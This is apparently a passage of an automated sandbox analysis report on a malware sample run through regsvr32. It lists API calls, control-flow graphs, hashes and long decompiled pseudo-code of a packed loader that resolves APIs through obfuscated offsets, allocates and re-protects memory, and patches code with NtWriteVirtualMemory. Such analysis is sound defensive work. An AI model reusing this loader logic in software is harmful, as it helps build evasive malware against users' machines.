                            0x1000cc79
                            0x1000cc79
                            0x1000cc80
                            0x1000cc87
                            0x1000cc8a
                            0x1000cc8f
                            0x1000cc9c
                            0x1000cca2
                            0x1000cca9

                            APIs
                              • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                              • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                              • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                              • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                              • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                              • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                              • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • memset.MSVCRT ref: 1000CBB8
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                            • String ID:
                            • API String ID: 317994034-0
                            • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                            • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00782C41, Relevance: 5.1, APIs: 3, Instructions: 582COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 236 782c41-782c4e 237 782c50-782c72 236->237 238 782c75-782c7c 236->238 237->238 239 782c7e-782ca3 238->239 240 782cc2-782cca 238->240 239->240 249 782ca5-782cbf 239->249 242 782d5d-782d65 240->242 243 782cd0-782cd7 240->243 245 782d7f-782d93 242->245 246 782d67-782d7e 242->246 247 782cd9-782cfa 243->247 248 782cfd-782d11 243->248 250 782d99-782da6 245->250 251 782e1b-782e25 245->251 246->245 247->248 259 782d13-782d42 248->259 260 782d45-782d5a 248->260 249->240 256 782da8-782dcf 250->256 257 782dd2-782df4 250->257 253 782e48-782e4f 251->253 254 782e27-782e47 251->254 262 782fd0-782fdd 253->262 263 782e55-782e5c 253->263 254->253 256->257 257->251 271 782df6-782e18 257->271 259->260 260->242 266 782fdf-782fff 262->266 267 783000 262->267 268 782e62-782e69 263->268 269 782ef5-782f14 263->269 266->267 277 783003-783006 267->277 275 782e6b-782e80 268->275 276 782e81-782e8e 268->276 273 782f3b-782f43 269->273 274 782f16-782f38 269->274 271->251 279 782f49-782f50 273->279 280 782fcd 273->280 274->273 275->276 292 782ebe-782ed9 276->292 293 782e90-782ebb 276->293 281 78309c-7830a5 277->281 282 78300c-783013 277->282 288 782f88-782fcc 279->288 289 782f52-782f82 279->289 285 7830a8-7830b2 281->285 290 783035-78303c 282->290 291 783015-783032 282->291 296 7830d4-7830e8 285->296 297 7830b4-7830d3 285->297 288->280 289->288 294 78303e-783060 290->294 295 783063-783070 290->295 291->290 292->269 301 782edb-782eef 292->301 293->292 294->295 295->281 295->285 302 7830ea-78310f 296->302 303 783112-78311c 296->303 297->296 301->269 302->303 307 78311e-783140 303->307 308 783143-78315a 303->308 307->308 309 78315c-783181 308->309 310 783184-78318e 308->310 309->310 315 783190-7831bf 310->315 316 7831c2-7831ca 310->316 315->316 318 7831cc-7831ee 316->318 319 7831f1-783204 LoadLibraryA 316->319 318->319 321 783205-78320b 319->321 323 78330d-783319 321->323 324 783211-783218 321->324 327 78331b-783334 323->327 328 783337 323->328 325 78321a-783233 324->325 326 783236-78323e 324->326 325->326 329 783240-783260 326->329 330 783261-78326d 326->330 327->328 331 78333e-783352 328->331 329->330 336 78326f-783291 330->336 337 783294-7832a7 330->337 332 78336a-783381 331->332 333 783354-783367 OleUninitialize 331->333 338 783383-7833a3 332->338 339 7833a6-7833c2 332->339 333->332 336->337 341 7832a9-7832cb 337->341 342 7832ce-7832e8 337->342 338->339 347 7833f2-78341a 339->347 348 7833c4-7833ef 339->348 341->342 342->331 349 78341c-783443 347->349 350 783446-78344e 347->350 348->347 349->350 350->321 351 783454-78345b 350->351 353 78347a-783489 351->353 354 78345d-783479 351->354 353->277 356 78348f-783496 353->356 354->353 358 783498-7834b3 OleInitialize 356->358 359 7834b4-7834b8 356->359 358->359 359->277 360 7834be-7834d7 359->360
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                            • Instruction ID: 8c7fc7b48dea3e45d6787360bd4698ee3818bb00c4bce2742e13cf2d58b18be6
                            • Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                            • Instruction Fuzzy Hash: D8427B72D00609DFEF04DFA4C9897AA7BB5FF64311F1850AADD0DAE149C73815A4CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00783073, Relevance: 4.8, APIs: 3, Instructions: 306comlibraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 361 783073-78309b 363 78309c-7830a5 361->363 364 7830a8-7830b2 363->364 365 7830d4-7830e8 364->365 366 7830b4-7830d3 364->366 367 7830ea-78310f 365->367 368 783112-78311c 365->368 366->365 367->368 370 78311e-783140 368->370 371 783143-78315a 368->371 370->371 372 78315c-783181 371->372 373 783184-78318e 371->373 372->373 376 783190-7831bf 373->376 377 7831c2-7831ca 373->377 376->377 379 7831cc-7831ee 377->379 380 7831f1-783204 LoadLibraryA 377->380 379->380 382 783205-78320b 380->382 384 78330d-783319 382->384 385 783211-783218 382->385 388 78331b-783334 384->388 389 783337 384->389 386 78321a-783233 385->386 387 783236-78323e 385->387 386->387 390 783240-783260 387->390 391 783261-78326d 387->391 388->389 392 78333e-783352 389->392 390->391 397 78326f-783291 391->397 398 783294-7832a7 391->398 393 78336a-783381 392->393 394 783354-783367 OleUninitialize 392->394 399 783383-7833a3 393->399 400 7833a6-7833c2 393->400 394->393 397->398 402 7832a9-7832cb 398->402 403 7832ce-7832e8 398->403 399->400 408 7833f2-78341a 400->408 409 7833c4-7833ef 400->409 402->403 403->392 410 78341c-783443 408->410 411 783446-78344e 408->411 409->408 410->411 411->382 412 783454-78345b 411->412 414 78347a-783489 412->414 415 78345d-783479 412->415 417 78348f-783496 414->417 418 783003-783006 414->418 415->414 420 783498-7834b3 OleInitialize 417->420 421 7834b4-7834b8 417->421 418->363 422 78300c-783013 418->422 420->421 421->418 423 7834be-7834d7 421->423 424 783035-78303c 422->424 425 783015-783032 422->425 426 78303e-783060 424->426 427 783063-783070 424->427 425->424 426->427 427->363 427->364
                            APIs
                            • LoadLibraryA.KERNEL32(00782C25,00782C25,458F0000,?,00000000), ref: 007831F1
                            • OleUninitialize.OLE32(00782C25), ref: 00783354
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: LibraryLoadUninitialize
                            • String ID:
                            • API String ID: 2978721001-0
                            • Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                            • Instruction ID: 5dbd3396b844fd462bcce41fc5092cd745ddfb62420d73db0d0bc2c36c14ce98
                            • Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                            • Instruction Fuzzy Hash: 68D16972C00618DFEF04DFA4C9897AABBB5FF54311F08546ADD0DAE149C73816A4CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00781424, Relevance: 3.3, APIs: 2, Instructions: 272memoryCOMMONCrypto
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 479 781424-781431 call 78463b 482 7814b1-7814c9 479->482 483 781433-78143a 479->483 486 7814cb-7814f2 482->486 487 7814f5-781510 482->487 484 78143c-78146d 483->484 485 78146e-781484 483->485 484->485 490 7814ab VirtualAlloc 485->490 491 781486-7814a8 485->491 486->487 488 781516-78151d 487->488 489 7815b7-7815b9 487->489 492 78151f-781552 488->492 493 781555-781565 488->493 495 7815bb-7815c2 489->495 496 781624-78164b 489->496 490->482 491->490 492->493 498 781581-7815b1 VirtualProtect 493->498 499 781567-781580 493->499 503 7815c4-7815e4 495->503 504 7815e5-7815f8 495->504 500 78166d-781675 496->500 501 78164d-78166a 496->501 498->489 499->498 508 781709-781715 500->508 509 78167b-781682 500->509 501->500 503->504 505 7815fa-78161c 504->505 506 78161f call 783726 504->506 505->506 506->496 512 78174f-781758 508->512 513 781717-78174c 508->513 517 7816d3-7816db 509->517 518 781684-7816d0 509->518 522 78175a-78177c 512->522 523 78177f-781785 512->523 513->512 519 7816dd-781701 517->519 520 781704 call 784495 517->520 518->517 519->520 520->508 522->523 526 781806-781826 523->526 527 781787-78178e 523->527 529 781790-7817a3 527->529 530 7817a6-7817b3 527->530 529->530 533 7817d2 call 78242a 530->533 534 7817b5-7817cf 530->534 538 7817d7-7817de 533->538 534->533 539 7817fb-781801 call 783658 538->539 540 7817e0-7817f5 538->540 539->526 540->539
                            C-Code - Quality: 50%
                            			E00781424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t154;
				int _t155;
				signed int _t158;
				int _t159;
				signed int _t160;
				intOrPtr _t163;
				signed int _t164;
				signed int _t166;
				signed int _t169;
				signed int _t171;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t212;
				signed int _t215;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				signed int _t234;
				signed int _t237;
				void* _t244;
				signed int* _t246;

				_t234 = __esi;
				_t224 = __edi;
				_t212 = __edx;
				_t155 = E0078463B(_t154, __ebx, __ecx, __edi);
				_push(__ecx);
				_t188 = __ebx | __ebx;
				_t185 = _t188;
				_pop(_t189);
				if(_t188 != 0) {
					if( *(_t185 + 0x4358a4) == 0) {
						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
						 *_t246 = _t189;
						 *(_t185 + 0x4358a4) = 0 ^ _t183;
						_t189 = 0;
					}
					_push(4);
					_push(0x1000);
					_push( *((intOrPtr*)(_t185 + 0x435280)));
					_push(0);
					if( *(_t185 + 0x435585) == 0) {
						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
						_t212 =  *(_t244 - 8);
					}
					_t155 = VirtualAlloc();
				}
				 *_t17 = _t155;
				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
				if( *(_t185 + 0x435014) == 0) {
					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
					 *(_t244 - 4) = _t224;
					 *(_t185 + 0x435014) = 0 ^ _t179;
					_t224 =  *(_t244 - 4);
					_t155 = (_t179 & 0x00000000) +  *_t246;
					_t246 =  &(_t246[1]);
				}
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
				_t237 = _t234;
				if( *(_t185 + 0x4350b0) > 0) {
					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
						 *(_t244 - 8) = _t237;
						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
						_t237 =  *(_t244 - 8);
					}
					_push(_t185 + 0x4354d2);
					_push(0x40);
					if( *(_t185 + 0x435968) == 0) {
						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
						_t189 = _t189;
					}
					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
					 *_t246 = _t189;
					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
					_t189 = 0;
					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
				}
				if(_t155 != _t185) {
					if( *(_t185 + 0x435366) == 0) {
						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
						_t224 = _t224;
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					_push( *((intOrPtr*)(_t185 + 0x435288)));
					if( *(_t185 + 0x435248) == 0) {
						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
						_t212 =  *(_t244 - 8);
					}
					_t155 = E00783726(_t185, _t189, _t212, _t224, _t237); // executed
				}
				 *(_t244 - 4) = _t212;
				_t190 = 0 ^  *(_t185 + 0x435462);
				_t215 =  *(_t244 - 4);
				 *(_t244 - 8) = _t155;
				_t225 = 0 ^  *(_t185 + 0x4350b0);
				_t158 =  *(_t244 - 8);
				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
					 *_t79 = _t158;
					_push( *(_t244 - 8));
					_pop( *_t81);
					 *_t82 = _t190;
					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
				}
				_t192 = _t225 | _t225;
				_t226 = _t192;
				_t193 = _t190;
				if(_t192 != 0) {
					if( *(_t185 + 0x435520) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
						 *(_t244 - 8) = _t193;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
						_t193 =  *_t246;
						_t246 =  &(_t246[1]);
					}
					_push(_t226);
					if( *(_t185 + 0x4353c6) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
						_t237 = _t237;
						_t193 = (_t193 & 0x00000000) +  *_t246;
						_t246 = _t246 - 0xfffffffc;
					}
					_t158 = E00784495(_t158, _t185, _t193, _t215, _t226, _t237);
				}
				 *_t246 =  *_t246 ^ _t158;
				_t159 = _t158;
				if( *(_t185 + 0x435855) == 0) {
					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
					 *(_t244 - 8) = _t226;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
					_t226 =  *(_t244 - 8);
					_pop( *_t113);
					_t193 =  *(_t244 - 8);
					 *_t115 = _t193;
					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
				}
				_t160 = memset(_t226, _t159, _t193 << 0);
				_t227 = _t226 + _t193;
				_t194 = 0;
				if( *(_t185 + 0x4353ce) == 0) {
					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
					 *(_t244 - 4) = _t215;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
					_t215 =  *(_t244 - 4);
				}
				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
					if( *(_t185 + 0x4357d6) == 0) {
						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t244 - 8) = _t237;
						 *(_t185 + 0x4357d6) = 0 ^ _t164;
						_t237 =  *(_t244 - 8);
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
						 *(_t244 - 8) = _t194;
						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
						_t194 =  *(_t244 - 8);
					}
					_t161 = E0078242A(_t185, _t194, _t215, _t227, _t237); // executed
					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
						 *_t146 =  *(_t244 - 4);
					}
					_t160 = E00783658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
				}
				 *(_t244 - 8) = _t194;
				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
				 *_t153 =  *(_t244 - 4);
				asm("popad");
				return _t160;
			}




































                            0x00781424
                            0x00781424
                            0x00781424
                            0x00781424
                            0x00781429
                            0x0078142c
                            0x0078142e
                            0x00781430
                            0x00781431
                            0x0078143a
                            0x00781458
                            0x00781460
                            0x00781467
                            0x0078146d
                            0x0078146d
                            0x0078146e
                            0x00781470
                            0x00781475
                            0x0078147b
                            0x00781484
                            0x0078148d
                            0x00781493
                            0x0078149b
                            0x007814a2
                            0x007814a8
                            0x007814a8
                            0x007814ab
                            0x007814ab
                            0x007814b2
                            0x007814b8
                            0x007814c9
                            0x007814d3
                            0x007814d9
                            0x007814e0
                            0x007814e6
                            0x007814ef
                            0x007814f2
                            0x007814f2
                            0x007814fb
                            0x00781502
                            0x00781508
                            0x00781510
                            0x0078151d
                            0x0078153f
                            0x00781545
                            0x0078154c
                            0x00781552
                            0x00781552
                            0x0078155b
                            0x0078155c
                            0x00781565
                            0x00781567
                            0x00781573
                            0x0078157a
                            0x00781580
                            0x00781580
                            0x00781595
                            0x0078159d
                            0x007815a4
                            0x007815aa
                            0x007815b1
                            0x007815b1
                            0x007815b9
                            0x007815c2
                            0x007815cb
                            0x007815d7
                            0x007815de
                            0x007815e4
                            0x007815e4
                            0x007815e5
                            0x007815eb
                            0x007815f8
                            0x00781601
                            0x00781607
                            0x0078160f
                            0x00781616
                            0x0078161c
                            0x0078161c
                            0x0078161f
                            0x0078161f
                            0x00781624
                            0x0078162f
                            0x00781631
                            0x00781634
                            0x0078163f
                            0x00781641
                            0x0078164b
                            0x0078164e
                            0x00781655
                            0x00781658
                            0x0078165b
                            0x00781667
                            0x0078166a
                            0x0078166a
                            0x00781670
                            0x00781672
                            0x00781674
                            0x00781675
                            0x00781682
                            0x007816ad
                            0x007816b3
                            0x007816bb
                            0x007816c2
                            0x007816cd
                            0x007816d0
                            0x007816d0
                            0x007816d3
                            0x007816db
                            0x007816de
                            0x007816ea
                            0x007816f1
                            0x007816f7
                            0x007816fe
                            0x00781701
                            0x00781701
                            0x00781704
                            0x00781704
                            0x0078170a
                            0x0078170d
                            0x00781715
                            0x0078171f
                            0x00781725
                            0x0078172d
                            0x00781734
                            0x0078173a
                            0x0078173d
                            0x00781740
                            0x00781749
                            0x0078174c
                            0x0078174c
                            0x0078174f
                            0x0078174f
                            0x0078174f
                            0x00781758
                            0x00781761
                            0x00781767
                            0x0078176f
                            0x00781776
                            0x0078177c
                            0x0078177c
                            0x00781785
                            0x0078178e
                            0x00781790
                            0x00781796
                            0x0078179d
                            0x007817a3
                            0x007817a3
                            0x007817a6
                            0x007817b3
                            0x007817bc
                            0x007817c2
                            0x007817c9
                            0x007817cf
                            0x007817cf
                            0x007817d2
                            0x007817de
                            0x007817ef
                            0x007817f5
                            0x007817f5
                            0x00781801
                            0x00781801
                            0x00781806
                            0x0078181b
                            0x00781821
                            0x00781824
                            0x00781826

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 007814AB
                            • VirtualProtect.KERNEL32(?), ref: 007815B1
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: Virtual$AllocProtect
                            • String ID:
                            • API String ID: 2447062925-0
                            • Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                            • Instruction ID: 16df22f572c5d7ff66d55aedf72c7645a118d9fbe60e2095afe0be5d86713f4e
                            • Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                            • Instruction Fuzzy Hash: 5EC16E72940604EFFF14DFA0C889B597BB5FF24311F1860A9ED0D9E19AD77815A4CB28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007832EB, Relevance: 3.2, APIs: 2, Instructions: 151comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 543 7832eb-783307 545 78330d-783319 543->545 546 78331b-783334 545->546 547 783337 545->547 546->547 548 78333e-783352 547->548 549 78336a-783381 548->549 550 783354-783367 OleUninitialize 548->550 552 783383-7833a3 549->552 553 7833a6-7833c2 549->553 550->549 552->553 556 7833f2-78341a 553->556 557 7833c4-7833ef 553->557 558 78341c-783443 556->558 559 783446-78344e 556->559 557->556 558->559 560 783454-78345b 559->560 561 783205-78320b 559->561 563 78347a-783489 560->563 564 78345d-783479 560->564 561->545 565 783211-783218 561->565 569 78348f-783496 563->569 570 783003-783006 563->570 564->563 567 78321a-783233 565->567 568 783236-78323e 565->568 567->568 571 783240-783260 568->571 572 783261-78326d 568->572 574 783498-7834b3 OleInitialize 569->574 575 7834b4-7834b8 569->575 576 78309c-7830a5 570->576 577 78300c-783013 570->577 571->572 580 78326f-783291 572->580 581 783294-7832a7 572->581 574->575 575->570 582 7834be-7834d7 575->582 579 7830a8-7830b2 576->579 583 783035-78303c 577->583 584 783015-783032 577->584 588 7830d4-7830e8 579->588 589 7830b4-7830d3 579->589 580->581 590 7832a9-7832cb 581->590 591 7832ce-7832e8 581->591 585 78303e-783060 583->585 586 783063-783070 583->586 584->583 585->586 586->576 586->579 593 7830ea-78310f 588->593 594 783112-78311c 588->594 589->588 590->591 591->548 593->594 598 78311e-783140 594->598 599 783143-78315a 594->599 598->599 601 78315c-783181 599->601 602 783184-78318e 599->602 601->602 605 783190-7831bf 602->605 606 7831c2-7831ca 602->606 605->606 608 7831cc-7831ee 606->608 609 7831f1-783204 LoadLibraryA 606->609 608->609 609->561
                            APIs
                            • OleUninitialize.OLE32(00782C25), ref: 00783354
                            • OleInitialize.OLE32(00000000,00000000), ref: 0078349A
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: InitializeUninitialize
                            • String ID:
                            • API String ID: 3442037557-0
                            • Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                            • Instruction ID: 8740d3ed38995ecab2828f4b51065ca9482b4e9796c215d29b2a3b57ddf8e504
                            • Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                            • Instruction Fuzzy Hash: E8519A72D04619DFEF14DFA4C8897AABBB1FF14311F08516ADD4DAE189C7380690CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00783726, Relevance: 2.2, APIs: 1, Instructions: 735comCOMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00783726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				void* _t425;
				signed int _t427;
				signed int _t429;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t441;
				signed int _t443;
				signed int _t446;
				signed int _t450;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t457;
				signed int _t459;
				signed int _t461;
				signed int _t462;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t473;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t480;
				signed int _t481;
				signed int _t486;
				signed int _t489;
				void* _t493;
				void* _t495;
				signed int _t497;
				signed int _t500;
				void* _t503;
				signed int _t504;
				signed int _t507;
				signed int _t509;
				signed int _t512;
				signed int _t514;
				signed int _t515;
				signed int _t520;
				signed int _t525;
				int _t527;
				int _t531;
				void* _t567;
				signed int _t568;
				signed int _t570;
				signed int _t584;
				signed int _t585;
				signed int _t587;
				void* _t590;
				void* _t592;
				void* _t625;
				intOrPtr* _t626;
				signed int _t627;
				void* _t629;
				signed int _t634;
				signed int _t637;
				signed int _t639;
				void* _t640;
				void* _t641;
				signed int _t657;
				signed int _t660;
				signed int* _t672;
				signed int* _t673;
				signed int* _t676;
				intOrPtr* _t677;
				signed int* _t678;

				_t625 = __esi;
				_t584 = __edi;
				_t567 = __edx;
				_t504 = __ecx;
				_t493 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
					_push(__ebx + 0x4354be);
					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_push(_v20);
					_pop( *_t6);
				}
				_t416 = _t493 + 0x435323;
				if( *(_t493 + 0x4351eb) == 0) {
					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
					 *_t672 = _t657;
					 *(_t493 + 0x4351eb) = 0 ^ _t489;
					_t657 = 0;
					_t416 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_push(_t416);
				_t417 = _t493 + 0x43569a;
				if( *(_t493 + 0x4354fd) == 0) {
					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
					_v12 = _t584;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
					_t584 = _v12;
					_t417 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
				_push(_v16);
				_pop( *_t25);
				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
					_push(_v12);
					_pop( *_t31);
				}
				_push(_t625);
				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
					_t481 = _t493 + 0x4353d6;
					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
						_push(_v20);
						_pop( *_t39);
						_t481 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
					_push(_v12);
					_pop( *_t43);
				}
				_push(_t584);
